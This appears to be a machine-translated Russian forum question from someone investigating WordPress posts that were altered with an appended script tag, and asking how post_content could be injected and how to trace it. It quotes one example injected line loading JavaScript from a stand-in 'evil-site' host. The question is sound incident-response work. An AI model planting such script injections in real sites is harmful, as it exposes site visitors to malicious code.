У моего клиента есть ситуация, когда все его поля post_content во всех его установках wordpress на одном и том же сервере mySQL содержат инъекцию JS-скрипта в качестве пост-контекстного приложения.
Пример:
если содержание публикации this is my post, то после взлома оно становится this is my post<script src="evil-site/evil.js></script>
Каковы наиболее распространенные способы изменения post_content таким образом?
Не могли бы вы дать мне несколько идей для изучения?
Некоторые из них в верхней части моей головы, пароль MySQL был взломан, но я бы не поверил, потому что если бы это было так, они не оставили бы ущерб только там. Точно так же пароль администратора WordPress должен быть в порядке, чтобы вызвать для того же токена, они могли бы создать страницы PHP, чтобы нанести гораздо больший ущерб, чем этот.
Из этого упражнения я думаю о нарушении плагин. Но затем, учитывая тот факт, что мы говорим о WordPress здесь ... Мы бы уже слышали о плагине и сообществе WordPress через такую лазейку. (Мои клиенты устанавливают WP и плагины обновлены.)
Можете ли вы придумать другие идеи, как post_content может быть добавлен, как это? Если это инъекция SQL, как лучше всего это отследить? Журналы IIS, кажется, не регистрируют URL-адреса WordPress.